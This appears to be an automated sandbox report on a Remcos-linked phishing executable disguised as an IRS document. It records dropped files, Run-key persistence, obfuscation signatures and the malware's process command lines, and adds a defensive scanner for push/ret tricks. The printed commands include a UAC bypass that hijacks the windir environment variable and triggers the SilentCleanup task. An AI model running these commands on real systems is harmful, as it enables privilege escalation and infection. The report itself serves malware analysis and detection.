Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_00409AA0 GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
Contains functionality to load and extract PE file embedded resources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_00409D73 FindResourceA,LoadResource,LockResource,SizeofResource
Contains functionality to modify services (start/stop/modify)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
Creates files inside the user directory
Source: C:\Users\user\Desktop\irs Doc Attached.exe | File created: C:\Users\Public\Kaphpos.exe
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-OMC9Q7
Executes batch files
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Kaph.vbs'
Parts of this application use Borland Delphi (probably coded in Delphi)
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 occurrences)
Source: C:\Users\Public\Kaphkos.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 occurrences)
Source: C:\Users\Public\Kaphpos.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (4 occurrences)
Reads ini files
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Users\user\Desktop\irs Doc Attached.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Users\Public\Kaphpos.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 occurrences)
Sample is known by Antivirus
Source: irs Doc Attached.exe | Virustotal: Detection: 12%
Source: irs Doc Attached.exe | ReversingLabs: Detection: 28%
Sample reads its own file content
Source: C:\Users\user\Desktop\irs Doc Attached.exe | File read: C:\Users\user\Desktop\irs Doc Attached.exe
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\irs Doc Attached.exe 'C:\Users\user\Desktop\irs Doc Attached.exe'
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknown | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Kaph.vbs'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Kaph.vbs'
Source: unknown | Process created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disable
Source: unknown | Process created: C:\Users\Public\Kaphpos.exe Kaphpos.exe
Source: unknown | Process created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disable
Source: unknown | Process created: C:\Users\Public\Kaphpos.exe Kaphpos.exe
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disable
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disable
Source: C:\Users\Public\Kaphkos.exe | Process created: C:\Users\Public\Kaphpos.exe Kaphpos.exe
Source: C:\Users\Public\Kaphpos.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\Public\Kaphkos.exe | Process created: C:\Users\Public\Kaphpos.exe Kaphpos.exe
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Submission file is bigger than most known malware samples
Source: irs Doc Attached.exe | Static file information: File size 1316866 > 1048576

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Code function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C (listed 9 times in the report)
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Code function: 0_3_0264E13C push 0040635Bh; ret 0_3_0264E18F (listed twice)
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Code function: 0_3_0264E13A push 0040635Bh; ret 0_3_0264E18F (listed twice)
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Code function: 0_3_0264E558 push 0040675Eh; ret 0_3_0264E592 (listed twice)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_004139B0 push eax; ret 2_2_004139DE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10545410 push eax; ret 2_2_1054543E
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00404C68 push 00404C94h; ret 12_2_00404C8C
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_0040846A push 00408492h; ret 12_2_0040848A
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_0040846C push 00408492h; ret 12_2_0040848A
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00404C2E push 00404C5Ch; ret 12_2_00404C54
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00404C30 push 00404C5Ch; ret 12_2_00404C54
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_004048C8 push 00404919h; ret 12_2_00404911
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00404CA0 push 00404F4Ch; ret 12_2_00404F44
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_004081D4 push 00408350h; ret 12_2_00408348
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00402E2C push eax; ret 12_2_00402E68
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00404B48 push 00404B74h; ret 12_2_00404B6C
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00408352 push 004083C3h; ret 12_2_004083BB
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00408354 push 004083C3h; ret 12_2_004083BB
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00404B10 push 00404B3Ch; ret 12_2_00404B34
Source: C:\Users\Public\Kaphkos.exe | Code function: 12_2_00404F20 push 00404F4Ch; ret 12_2_00404F44
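The "push imm32; ret" and "push eax; ret" pairs listed above are the obfuscation this signature names: instead of a direct call or jmp, the code pushes the destination and executes ret, so the transfer looks like a function return to a linear disassembler and does not show up as a call-graph edge. The scanner below is an added example, not part of the Joe Sandbox report or of any Remcos tooling: it sweeps a constructed byte buffer (invented here, with one pair shaped like the report's push 0040635Bh; ret) for both forms and reports the address and, for the immediate form, the pushed target. IMAGE_BASE is a made-up load address used only for the reported offsets.

```python
"""Linear-sweep scanner for push/ret call-redirection pairs in raw x86 code.

Added example for this report (not Joe Sandbox code). SAMPLE_CODE is a constructed
buffer and IMAGE_BASE an invented load address used only to report addresses.
"""
from typing import List, Optional, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # push r32 = 0x50 + index

SAMPLE_CODE = bytes.fromhex(
    "33c0"          # xor eax, eax
    "50c3"          # push eax ; ret        -> control goes to whatever eax holds
    "90"            # nop
    "685b634000c3"  # push 0040635Bh ; ret  -> jump to 0x0040635B with no call/jmp
    "c3"            # lone ret, not a pair
    "6800000000"    # push 0 with no ret after it, not a pair
    "90"            # nop
)
IMAGE_BASE = 0x0264E000


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str, Optional[int]]]:
    """Return (address, mnemonic, target) for every push-imm32/ret and push-r32/ret pair.

    target is the pushed immediate for the imm32 form and None for the register form,
    where the destination is only known at run time.
    """
    hits = []
    i = 0
    while i < len(code):
        b = code[i]
        if b == 0x68 and i + 5 < len(code) and code[i + 5] == 0xC3:
            target = int.from_bytes(code[i + 1:i + 5], "little")
            hits.append((base + i, "push imm32; ret", target))
            i += 6
        elif 0x50 <= b <= 0x57 and i + 1 < len(code) and code[i + 1] == 0xC3:
            hits.append((base + i, f"push {REG32[b - 0x50]}; ret", None))
            i += 2
        else:
            i += 1  # byte-by-byte sweep; no instruction-length decoding is attempted
    return hits


if __name__ == "__main__":
    for addr, mnem, target in find_push_ret(SAMPLE_CODE, IMAGE_BASE):
        suffix = f"  -> {target:08X}" if target is not None else ""
        print(f"{addr:08X}  {mnem}{suffix}")
```

This is a heuristic, not a disassembler: a byte-wise sweep can land inside data or inside a longer instruction whose operand happens to contain 0x68 or 0x50..0x57 followed by 0xC3, so each hit should be confirmed in a disassembler before it is treated as a redirection. For the imm32 form the reported target is the address the code will execute next, which is what a human analyst wants when rebuilding the control flow the obfuscation hides.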

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Contains functionality to download and launch executablesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040D427 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040D427
Drops PE filesShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphpos.exeJump to dropped file
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphkos.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphpos.exeJump to dropped file
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphkos.exeJump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kaph C:\Users\Public\Kaph.vbs
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\irs Doc Attached.exe | File created: C:\Users\Public\Kaphpos.exe
Source: C:\Users\user\Desktop\irs Doc Attached.exe | File created: C:\Users\Public\Kaphkos.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Contains functionality to start Windows services
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_004111A9
Creates an autostart registry key
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kaph
Source: C:\Users\user\Desktop\irs Doc Attached.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kaph

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_004099CD
Disables application error messages (SetErrorMode)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected Windows Security Disabler
Source: Yara matchFile source: 00000000.00000003.766854690.00000000026D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.770267102.0000000002694000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1093899010.000000000234C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.761436318.00000000026CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1099014785.0000000002358000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1082855778.00000000023AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.782605619.0000000002678000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1136818613.00000000023A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.763824747.00000000026CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.772963441.0000000002698000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1110307388.0000000002360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.766435642.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1112897408.0000000002318000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.777186786.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1088712263.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1121883396.0000000002364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.771926452.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1133165344.0000000002380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1091775163.000000000236C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.772815757.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1090365744.0000000002328000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1109366077.000000000237C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1138786105.0000000002324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1092860595.0000000002328000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1136608340.000000000237C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.765169237.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.773128021.00000000026C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1112463232.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1085861537.0000000002328000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1122224180.0000000002388000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1115288917.000000000235C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1087506928.0000000002370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1119724646.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.768234983.0000000002694000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.762687888.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1101082862.0000000002358000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1118848727.0000000002318000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1120904818.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1087278456.000000000234C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1125495907.0000000002370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1118540574.000000000233C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1089835321.0000000002328000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.765559265.00000000026AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1119154427.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.765787456.0000000002668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.785678487.0000000002678000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1107759816.0000000002314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1126848225.00000000023A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1097701199.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.782392985.0000000002708000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1109703647.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1103092580.0000000002380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1106198392.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1113570987.000000000235C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1102746986.0000000002358000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.764335459.00000000026B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1117099056.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1115780925.000000000233C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1126971210.0000000002320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.773997608.00000000026C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1083697837.0000000002348000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1116665031.0000000002360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.763400708.0000000002668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1118194716.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1115129515.000000000233C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1133547090.00000000023AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1127190054.0000000002348000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1092210053.0000000002328000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.782772276.00000000026A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1143715005.0000000002358000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.772672455.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1121331550.000000000231C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.773531107.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1107861655.0000000002360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1147019683.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1136207159.0000000002324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1101891970.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1145144727.00000000022FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1104633731.0000000002380000.00000004.00000001.sdmp, type: MEMORY
